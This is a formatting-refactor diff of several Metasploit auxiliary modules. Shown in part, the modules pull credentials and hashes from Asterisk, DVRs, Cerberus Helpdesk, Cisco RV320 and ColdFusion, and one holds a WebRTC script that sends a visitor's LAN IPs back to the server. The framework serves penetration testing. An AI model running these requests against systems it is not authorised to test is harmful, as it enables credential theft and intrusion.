
-
 end
@@ -8,21 +8,29 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Asterisk Gather Credentials',
-      'Description' => %q{
-        This module retrieves SIP and IAX2 user extensions and credentials from
-        Asterisk Call Manager service. Valid manager credentials are required.
-      },
-      'Author'      => 'bcoles',
-      'References'  =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Asterisk Gather Credentials',
+        'Description' => %q{
+          This module retrieves SIP and IAX2 user extensions and credentials from
+          Asterisk Call Manager service. Valid manager credentials are required.
+        },
+        'Author' => 'bcoles',
+        'References' => [
          ['URL', 'http://www.asterisk.name/sip1.html'],
          ['URL', 'http://www.asterisk.name/iax2.html'],
          ['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],
          ['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']
        ],
-      'License'     => MSF_LICENSE))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
    register_options [
      Opt::RPORT(5038),
      OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),
@@ -59,17 +67,19 @@ class MetasploitModule < Msf::Auxiliary

    print_status "Found #{@users.length} users"

-    cred_table = Rex::Text::Table.new 'Header'  => 'Asterisk User Credentials',
-                                      'Indent'  => 1,
+    cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
+                                      'Indent' => 1,
                                      'Columns' => ['Username', 'Secret', 'Type']

    @users.each do |user|
-      cred_table << [ user['username'],
-                      user['password'],
-                      user['type'] ]
-      report_cred user:     user['username'],
+      cred_table << [
+        user['username'],
+        user['password'],
+        user['type']
+      ]
+      report_cred user: user['username'],
                  password: user['password'],
-                  proof:    "#{user['type']} show users"
+                  proof: "#{user['type']} show users"
    end

    print_line
@@ -100,25 +110,25 @@ class MetasploitModule < Msf::Auxiliary

  def report_cred(opts)
    service_data = {
-      address:      rhost,
-      port:         rport,
+      address: rhost,
+      port: rport,
      service_name: 'asterisk_manager',
-      protocol:     'tcp',
+      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
-      origin_type:     :service,
+      origin_type: :service,
      module_fullname: fullname,
-      username:        opts[:user],
-      private_data:    opts[:password],
-      private_type:    :password
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
    }.merge service_data

    login_data = {
-      core:              create_credential(credential_data),
-      status:            Metasploit::Model::Login::Status::UNTRIED,
-      proof:             opts[:proof]
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
    }.merge service_data

    create_credential_login login_data
@@ -152,14 +162,14 @@ class MetasploitModule < Msf::Auxiliary

    return false unless res =~ /Response: Success/

-    report_cred user:     username,
+    report_cred user: username,
                password: password,
-                proof:    'Response: Success'
+                proof: 'Response: Success'

-    report_service :host  => rhost,
-                   :port  => rport,
+    report_service :host => rhost,
+                   :port => rport,
                   :proto => 'tcp',
-                   :name  => 'asterisk'
+                   :name => 'asterisk'
    true
  end

@@ -8,21 +8,28 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
-      'Description'    => %q{
-        This module will extract the account information from the AVTECH 744 DVR devices,
-        including usernames, cleartext passwords, and the device PIN, along with
-        a few other miscellaneous details. In order to extract the information, hardcoded
-        credentials admin/admin are used. These credentials can't be changed from the device
-        console UI nor from the web UI.
-      },
-      'Author'         => [ 'nstarke' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'AVTECH 744 DVR Account Information Retrieval',
+        'Description' => %q{
+          This module will extract the account information from the AVTECH 744 DVR devices,
+          including usernames, cleartext passwords, and the device PIN, along with
+          a few other miscellaneous details. In order to extract the information, hardcoded
+          credentials admin/admin are used. These credentials can't be changed from the device
+          console UI nor from the web UI.
+        },
+        'Author' => [ 'nstarke' ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

-
  def run
    res = send_request_cgi({
      'method' => 'POST',
@@ -6,28 +6,35 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::BrowserExploitServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HTTP Client Information Gather",
-      'Description'    => %q{
-        This module gathers information about a browser that exploits might be interested in, such
-        as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
-        but you can customize this output by changing the Custom404 datastore option, and
-        redirect to an external web page.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'DisclosureDate' => '2016-03-22',
-      'Actions'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "HTTP Client Information Gather",
+        'Description' => %q{
+          This module gathers information about a browser that exploits might be interested in, such
+          as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
+          but you can customize this output by changing the Custom404 datastore option, and
+          redirect to an external web page.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'DisclosureDate' => '2016-03-22',
+        'Actions' => [
          [
            'WebServer',
-              'Description' => 'A web server that collects information about the browser.'
+            'Description' => 'A web server that collects information about the browser.'
          ]
        ],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

  def is_key_wanted?(key)
@@ -10,25 +10,30 @@ class MetasploitModule < Msf::Auxiliary
    super(
      update_info(
        info,
-        'Name'           => 'HTTP Client LAN IP Address Gather',
-        'Description'    => %q(
+        'Name' => 'HTTP Client LAN IP Address Gather',
+        'Description' => %q{
          This module retrieves a browser's network interface IP addresses
          using WebRTC.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Daniel Roesler', # JS Code
          'Dhiraj Mishra'   # MSF Module
-         ],
-        'References'     => [
-           [ 'CVE', '2018-6849' ],
-           [ 'URL', 'http://net.ipcalf.com/' ],
-           [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
-         ],
+        ],
+        'References' => [
+          [ 'CVE', '2018-6849' ],
+          [ 'URL', 'http://net.ipcalf.com/' ],
+          [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
+        ],
        'DisclosureDate' => '2013-09-05',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
      )
    )
  end
@@ -38,94 +43,94 @@ class MetasploitModule < Msf::Auxiliary
  end

  def setup
-     # code from: https://github.com/diafygi/webrtc-ips
-     @html = <<-JS
-<script>
-//get the IP addresses associated with an account
-function getIPs(callback){
-    var ip_dups = {};
+    # code from: https://github.com/diafygi/webrtc-ips
+    @html = <<~JS
+      <script>
+      //get the IP addresses associated with an account
+      function getIPs(callback){
+          var ip_dups = {};

-    //compatibility for firefox and chrome
-    var RTCPeerConnection = window.RTCPeerConnection
-        || window.mozRTCPeerConnection
-        || window.webkitRTCPeerConnection;
-    var useWebKit = !!window.webkitRTCPeerConnection;
+          //compatibility for firefox and chrome
+          var RTCPeerConnection = window.RTCPeerConnection
+              || window.mozRTCPeerConnection
+              || window.webkitRTCPeerConnection;
+          var useWebKit = !!window.webkitRTCPeerConnection;

-    //bypass naive webrtc blocking using an iframe
-    if(!RTCPeerConnection){
-        //NOTE: you need to have an iframe in the page right above the script tag
-        //
-        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
-        //<script>...getIPs called in here...
-        //
-        var win = iframe.contentWindow;
-        RTCPeerConnection = win.RTCPeerConnection
-            || win.mozRTCPeerConnection
-            || win.webkitRTCPeerConnection;
-        useWebKit = !!win.webkitRTCPeerConnection;
-    }
+          //bypass naive webrtc blocking using an iframe
+          if(!RTCPeerConnection){
+              //NOTE: you need to have an iframe in the page right above the script tag
+              //
+              //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
+              //<script>...getIPs called in here...
+              //
+              var win = iframe.contentWindow;
+              RTCPeerConnection = win.RTCPeerConnection
+                  || win.mozRTCPeerConnection
+                  || win.webkitRTCPeerConnection;
+              useWebKit = !!win.webkitRTCPeerConnection;
+          }

-    //minimal requirements for data connection
-    var mediaConstraints = {
-        optional: [{RtpDataChannels: true}]
-    };
+          //minimal requirements for data connection
+          var mediaConstraints = {
+              optional: [{RtpDataChannels: true}]
+          };

-    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
+          var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

-    //construct a new RTCPeerConnection
-    var pc = new RTCPeerConnection(servers, mediaConstraints);
+          //construct a new RTCPeerConnection
+          var pc = new RTCPeerConnection(servers, mediaConstraints);

-    function handleCandidate(candidate){
-        //match just the IP address
-        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
-        var ip_addr = ip_regex.exec(candidate)[1];
+          function handleCandidate(candidate){
+              //match just the IP address
+              var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
+              var ip_addr = ip_regex.exec(candidate)[1];

-        //remove duplicates
-        if(ip_dups[ip_addr] === undefined)
-            callback(ip_addr);
+              //remove duplicates
+              if(ip_dups[ip_addr] === undefined)
+                  callback(ip_addr);

-        ip_dups[ip_addr] = true;
-    }
+              ip_dups[ip_addr] = true;
+          }

-    //listen for candidate events
-    pc.onicecandidate = function(ice){
+          //listen for candidate events
+          pc.onicecandidate = function(ice){

-        //skip non-candidate events
-        if(ice.candidate)
-            handleCandidate(ice.candidate.candidate);
-    };
+              //skip non-candidate events
+              if(ice.candidate)
+                  handleCandidate(ice.candidate.candidate);
+          };

-    //create a bogus data channel
-    pc.createDataChannel("");
+          //create a bogus data channel
+          pc.createDataChannel("");

-    //create an offer sdp
-    pc.createOffer(function(result){
+          //create an offer sdp
+          pc.createOffer(function(result){

-        //trigger the stun server request
-        pc.setLocalDescription(result, function(){}, function(){});
+              //trigger the stun server request
+              pc.setLocalDescription(result, function(){}, function(){});

-    }, function(){});
+          }, function(){});

-    //wait for a while to let everything done
-    setTimeout(function(){
-        //read candidate info from local description
-        var lines = pc.localDescription.sdp.split('\\n');
+          //wait for a while to let everything done
+          setTimeout(function(){
+              //read candidate info from local description
+              var lines = pc.localDescription.sdp.split('\\n');

-        lines.forEach(function(line){
-            if(line.indexOf('a=candidate:') === 0)
-                handleCandidate(line);
-        });
-    }, 1000);
-}
+              lines.forEach(function(line){
+                  if(line.indexOf('a=candidate:') === 0)
+                      handleCandidate(line);
+              });
+          }, 1000);
+      }

-getIPs(function(ip){
-  //console.log(ip);
-  var xmlhttp = new XMLHttpRequest;
-  xmlhttp.open('POST', window.location, true);
-  xmlhttp.send(ip);
-});
-</script>
-     JS
+      getIPs(function(ip){
+        //console.log(ip);
+        var xmlhttp = new XMLHttpRequest;
+        xmlhttp.open('POST', window.location, true);
+        xmlhttp.send(ip);
+      });
+      </script>
+    JS
  end

  def on_request_uri(cli, request)
@@ -10,19 +10,18 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'         => 'C2S DVR Management Password Disclosure',
-      'Description'  => %q{
+      'Name' => 'C2S DVR Management Password Disclosure',
+      'Description' => %q{
        C2S DVR allows an unauthenticated user to disclose the username
        & password by requesting the javascript page 'read.cgi?page=2'.
        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
      },
-      'References'   => [['EDB', '40265']],
-      'Author'       =>
-        [
-          'Yakir Wizman', # discovery
-          'h00die',    # module
-        ],
-      'License'      => MSF_LICENSE,
+      'References' => [['EDB', '40265']],
+      'Author' => [
+        'Yakir Wizman', # discovery
+        'h00die', # module
+      ],
+      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Aug 19 2016'
    )

@@ -36,8 +35,8 @@ class MetasploitModule < Msf::Auxiliary
      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
      vprint_status("Attempting to load data from #{url}?page=2")
      res = send_request_cgi({
-        'uri'      => url,
-        'vars_get' => {'page'=>'2'}
+        'uri' => url,
+        'vars_get' => { 'page' => '2' }
      })
      unless res
        print_error("#{peer} Unable to connect to #{url}")
@@ -52,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary
      if res.body =~ /pw_adminpw = "(.+?)";/
        print_good("Found: admin:#{$1}")
        store_valid_credential(
-          user:         'admin',
-          private:      $1,
+          user: 'admin',
+          private: $1,
          private_type: :password
        )
      end
@@ -61,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
      if res.body =~ /pw_userpw = "(.+?)";/
        print_good("Found: user:#{$1}")
        store_valid_credential(
-          user:         'user',
-          private:      $1,
+          user: 'user',
+          private: $1,
          private_type: :password
        )
      end
@@ -10,29 +10,28 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
-      'Description'  => %q{
+      'Name' => 'Cerberus Helpdesk User Hash Disclosure',
+      'Description' => %q{
        This module extracts usernames and password hashes from the Cerberus Helpdesk
        through an unauthenticated access to a workers file.
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
        },
-      'References'   =>
-        [
-          [ 'EDB', '39526' ]
-        ],
-      'Author'       =>
-        [
-          'asdizzle_', # discovery
-          'h00die',    # module
-        ],
-      'License'      => MSF_LICENSE,
+      'References' => [
+        [ 'EDB', '39526' ]
+      ],
+      'Author' => [
+        'asdizzle_', # discovery
+        'h00die', # module
+      ],
+      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Mar 7 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
-      ])
+      ]
+    )
  end

  def run_host(rhost)
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
      ['devblocks', 'zend'].each do |site|
        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
        vprint_status("Attempting to load data from #{url}")
-        res = send_request_cgi({'uri' => url})
+        res = send_request_cgi({ 'uri' => url })
        if !res
          print_error("#{peer} Unable to connect to #{url}")
          next
@@ -51,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
          next
        end

-        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
-                                          'Indent'  => 1,
+        cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
+                                          'Indent' => 1,
                                          'Columns' => ['Username', 'Password Hash']

        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
@@ -66,8 +65,8 @@ class MetasploitModule < Msf::Auxiliary
            password_hash = cred[7].tr('";', '') # remove extra characters
            print_good("Found: #{username}:#{password_hash}")
            store_valid_credential(
-              user:         username,
-              private:      password_hash,
+              user: username,
+              private: password_hash,
              private_type: :nonreplayable_hash
            )
            cred_table << [username, password_hash]
@@ -77,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
        print_line cred_table.to_s
        break
      end
-
    rescue ::Rex::ConnectionError
      print_error("#{peer} Unable to connect to site")
      return
@@ -8,33 +8,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
-      'Description'    => %q{
-        This module sends a query to the port 264/TCP on CheckPoint Firewall-1
-        firewalls to obtain the firewall name and management station
-        (such as SmartCenter) name via a pre-authentication request. The string
-        returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
-        host. Whilst considered "public" information, the majority of installations
-        use detailed hostnames which may aid an attacker in focusing on compromising
-        the SmartCenter host, or useful for government, intelligence and military
-        networks where the hostname reveals the physical location and rack number
-        of the device, which may be unintentionally published to the world.
-      },
-      'Author'         => [ 'aushack' ],
-      'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
+        'Description' => %q{
+          This module sends a query to the port 264/TCP on CheckPoint Firewall-1
+          firewalls to obtain the firewall name and management station
+          (such as SmartCenter) name via a pre-authentication request. The string
+          returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
+          host. Whilst considered "public" information, the majority of installations
+          use detailed hostnames which may aid an attacker in focusing on compromising
+          the SmartCenter host, or useful for government, intelligence and military
+          networks where the hostname reveals the physical location and rack number
+          of the device, which may be unintentionally published to the world.
+        },
+        'Author' => [ 'aushack' ],
+        'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
+        'References' => [
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(264),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -65,15 +73,16 @@ class MetasploitModule < Msf::Auxiliary
      print_error("Unexpected response: '#{res.inspect}'")
    end

-    report_info(fw_hostname,sc_hostname)
+    report_info(fw_hostname, sc_hostname)

    disconnect
  end

  # Only trust that it's real if we have a hostname. If you get a funny
  # response, it might not be what we think it is.
-  def report_info(fw_hostname,sc_hostname)
+  def report_info(fw_hostname, sc_hostname)
    return unless fw_hostname
+
    host_info = {
      :host => datastore['RHOST'],
      :os_name => "Checkpoint Firewall-1",
@@ -10,20 +10,28 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
-      'Description' => %q{
-        This module uses the Chrome Debugger's API to read
-        files off the remote file system, or to make web requests
-        from a remote machine.  Useful for cloud metadata endpoints!
-      },
-      'Author' => [
-        'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
-        'Nicholas Starke (The King Pig Demon)' # msf module
-      ],
-      'DisclosureDate' => '2019-09-24',
-      'License' => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
+        'Description' => %q{
+          This module uses the Chrome Debugger's API to read
+          files off the remote file system, or to make web requests
+          from a remote machine.  Useful for cloud metadata endpoints!
+        },
+        'Author' => [
+          'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
+          'Nicholas Starke (The King Pig Demon)' # msf module
+        ],
+        'DisclosureDate' => '2019-09-24',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -86,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
            'id' => id,
            'method' => 'Page.navigate',
            'params' => {
-              url:  fetch_uri
+              url: fetch_uri
            }
          }.to_json)
        end
@@ -7,9 +7,11 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cisco RV320/RV326 Configuration Disclosure',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
+        'Description' => %q{
          A vulnerability in the web-based management interface of Cisco Small Business
          RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
          remote attacker to retrieve sensitive information. The vulnerability is due
@@ -19,14 +21,12 @@ class MetasploitModule < Msf::Auxiliary
          download the router configuration or detailed diagnostic information. Cisco
          has released firmware updates that address this vulnerability.
        },
-      'Author'         =>
-        [
+        'Author' => [
          'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',
          'Aaron Soto <asoto@rapid7.com>'
        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
@@ -34,18 +34,24 @@ class MetasploitModule < Msf::Auxiliary
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
-      'DisclosureDate' => '2019-01-24',
-      'DefaultOptions' =>
-        {
-          'SSL'   => true
+        'DisclosureDate' => '2019-01-24',
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
-    ))
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
-      ])
+      ]
+    )
  end

  def report_cred(user, hash)
@@ -100,8 +106,8 @@ class MetasploitModule < Msf::Auxiliary
    begin
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({
-        'uri'     => uri,
-        'method'  => 'GET',
+        'uri' => uri,
+        'method' => 'GET',
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed.  Consider setting SSL to false and trying again.')
@@ -116,8 +122,8 @@ class MetasploitModule < Msf::Auxiliary
    body = res.body
    if body.match(/####sysconfig####/)
      parse_config(body)
-    else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
-      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
+    else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"
+         fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    end
  end
 end
@@ -7,23 +7,31 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Citrix MetaFrame ICA Published Applications Scanner',
-      'Description'    => %q{
-        This module attempts to query Citrix Metaframe ICA server to obtain
-        a published list of applications.
-      },
-      'Author'         => [ 'aushack' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
+        'Description' => %q{
+          This module attempts to query Citrix Metaframe ICA server to obtain
+          a published list of applications.
+        },
+        'Author' => [ 'aushack' ],
+        'References' => [
          [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(1604),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -46,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
    udp_sock.put(client_connect)
    res = udp_sock.get(3)

-    if (res[0,server_response.length] == server_response)
+    if (res[0, server_response.length] == server_response)
      print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")

      find_published =
@@ -62,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
      res = udp_sock.get(3)

      if (res.index(server_list_pre) == 0) # good packet, with following data
-        print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n"))
+        print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length, res.length].gsub("\x00", "\r\n"))
      end
    else
      print_error("Citrix did not report any Published Applications. Try the brute force module instead.")
@@ -7,24 +7,32 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
-      'Description'    => %q{
-        This module attempts to brute force program names within the Citrix
-        Metaframe ICA server.
-      },
-      'Author'         => [ 'aushack' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
+        'Description' => %q{
+          This module attempts to brute force program names within the Citrix
+          Metaframe ICA server.
+        },
+        'Author' => [ 'aushack' ],
+        'References' => [
          [ 'OSVDB', '50617' ],
          [ 'BID', '5817' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(1604),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -142,11 +150,10 @@ class MetasploitModule < Msf::Auxiliary
    udp_sock.put(client_connect)
    res = udp_sock.get(3)

-    if (res[0,server_response.length] == server_response)
+    if (res[0, server_response.length] == server_response)
      print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")

      applications.each do |application|
-
        # Create the packet
        packet = [52 + application.length].pack('C')
        packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -161,11 +168,11 @@ class MetasploitModule < Msf::Auxiliary
        udp_sock.put(packet)
        res = udp_sock.get(3)

-        if (res[0,application_valid.length] == application_valid)
+        if (res[0, application_valid.length] == application_valid)
          print_status("Found: #{application}")
        end

-        if (res[0,application_invalid.length] == application_invalid)
+        if (res[0, application_invalid.length] == application_invalid)
          print_error("NOT Found: #{application}")
        end
      end
@@ -8,43 +8,50 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => "ColdFusion 'password.properties' Hash Extraction",
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => "ColdFusion 'password.properties' Hash Extraction",
+        'Description' => %q{
          This module uses a directory traversal vulnerability to extract information
-        such as password, rdspassword, and "encrypted" properties. This module has been
-        tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
-      },
-      'References'     =>
-        [
+          such as password, rdspassword, and "encrypted" properties. This module has been
+          tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
+        },
+        'References' => [
          [ 'CVE', '2013-3336' ],
          [ 'OSVDB', '93114' ],
          [ 'EDB', '25305' ]
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'HTP',
          'sinn3r',
          'nebulus'
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2013-05-07'  #The day we saw the subzero poc
-    ))
+        'License' => MSF_LICENSE,
+        # The day we saw the subzero poc
+        'DisclosureDate' => '2013-05-07',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
-      ])
+      ]
+    )
  end

  def fingerprint(response)
-
-    if(response.headers.has_key?('Server') )
-      if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
+    if (response.headers.has_key?('Server'))
+      if (response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
        os = "Windows (#{response.headers['Server']})"
-      elsif(response.headers['Server'] =~ /Apache\//)
-          os = "Unix (#{response.headers['Server']})"
+      elsif (response.headers['Server'] =~ /Apache\//)
+        os = "Unix (#{response.headers['Server']})"
      else
        os = response.headers['Server']
      end
@@ -54,41 +61,41 @@ class MetasploitModule < Msf::Auxiliary

    title = "Not Found"
    response.body.gsub!(/[\r\n]/, '')
-    if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
+    if (response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
      title = $1
      title.gsub!(/\s/, '')
    end
-    return nil  if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
+    return nil if (title == 'Not Found' or not title =~ /ColdFusionAdministrator/)

    out = nil

-    if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
+    if (response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
      v = $1
      out = (v =~ /^6/) ? "Adobe ColdFusion MX6 (Not Vulnerable)" : "Adobe ColdFusion MX7 (Not Vulnerable)"
